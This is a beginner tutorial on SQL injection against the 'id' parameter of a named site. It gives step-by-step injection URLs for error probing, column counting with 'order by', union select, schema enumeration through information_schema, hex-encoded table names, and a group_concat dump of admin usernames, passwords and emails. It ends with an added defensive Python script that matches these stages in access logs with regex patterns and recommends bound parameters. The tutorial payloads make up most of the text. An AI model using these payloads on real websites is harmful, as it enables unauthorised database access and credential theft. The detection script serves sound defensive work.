SQL injection (SQLi) is a technique for dumping a website's database.
It is an old trick, yet many websites are still vulnerable to it.
TUTORIAL FOR BEGINNERS
Finding vulnerability:
I have a link with the URL http://www.ajithkp560.com/index.php?id=10
Now add a single quote (') at the end of the URL, that is, http://www.ajithkp560.com/index.php?id=10'
If you get an error message, the website is vulnerable to SQLi.
Finding the total number of columns
Find the number of columns with the "order by" clause:
http://www.ajithkp560.com/index.php?id=10+order+by+1-- --> No error
http://www.ajithkp560.com/index.php?id=10+order+by+2-- --> No error
http://www.ajithkp560.com/index.php?id=10+order+by+3-- --> No error
...
...
...
http://www.ajithkp560.com/index.php?id=10+order+by+10-- --> Error
Since "order by 10" gives an error and the lower values do not, we can tell there are 9 columns.
Finding the vulnerable column
The vulnerable column can be found with union+select+1,2,3,...,TotalNumberOfColumns--
i.e., http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,3,4,5,6,7,8,9--
** id=-10 is used to find the vulnerable column.
We can find the SQL version with http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,@@version,4,5,6,7,8,9--
After finding the vulnerable column, we want to list all tables in the database (DB).
We can do this with the query below:
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables--
Next, get the columns of a table. We need to encode the table name in hexadecimal.
I'm going to encode the table name usuarios_adm in hexadecimal.
Encode it here:
http://ajithkp560.hostei.com/online_tools/hexatool.php
usuarios_adm = 7573756172696f735f61646d
Now the URL becomes:
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573756172696f735f61646d--
** 0xHexValue --> the 0x prefix tells the database that the value is a hexadecimal literal.
Dumping data from columns
Data is dumped with:
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name_1,0x3a, column_name_2,0x3a,....column_name_n,0x3b),4,5,6,7,8,9+from+table_name_xxx--
I have dumped the data here with:
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(user,0x3a,pass,0x3a,email,0x3b),4,5,6,7,8,9+from+usuarios_adm--
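A defender's view of the steps above, as an added example that is not part of the original tutorial: each stage leaves a recognisable pattern in the web server's access log, and one client walking through several stages stands out. The "IP URL" log format, the IP addresses, the stage names and the function names are assumptions made for this example, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One signature per stage of the tutorial, matched against decoded query
# values, so "+" and %-encoding are normalised before matching.
STAGES = [
    ("quote_probe", re.compile(r"^\d+'$")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),
    ("concat_dump", re.compile(r"\bgroup_concat\s*\(", re.I)),
]

# Constructed sample log: "<client ip> <request URL>" per line.
SAMPLE_LOG = [
    "198.51.100.7 /index.php?id=10",
    "203.0.113.5 /index.php?id=10'",
    "203.0.113.5 /index.php?id=10+order+by+10--",
    "203.0.113.5 /index.php?id=-10+union+select+1,2,3,4,5,6,7,8,9--",
    "203.0.113.5 /index.php?id=-10+UNION+SELECT+1,2,group_concat(table_name),"
    "4,5,6,7,8,9+from+information_schema.tables--",
    "198.51.100.7 /index.php?id=11&sort=order",
]

def classify(url):
    """Return the sorted stage names matched by any query parameter value."""
    hits = set()
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for stage, pattern in STAGES:
            if pattern.search(value):
                hits.add(stage)
    return sorted(hits)

def suspicious_clients(log_lines, min_stages=2):
    """Report clients whose requests matched at least min_stages stages."""
    per_ip = {}
    for line in log_lines:
        ip, _, url = line.partition(" ")
        per_ip.setdefault(ip, set()).update(classify(url))
    return {ip: sorted(s) for ip, s in per_ip.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for ip, stages in suspicious_clients(SAMPLE_LOG).items():
        print(ip, stages)
```

Log matching of this kind complements the actual fix, which is to pass id to the query as a bound, typed parameter so that none of these strings is ever interpreted as SQL.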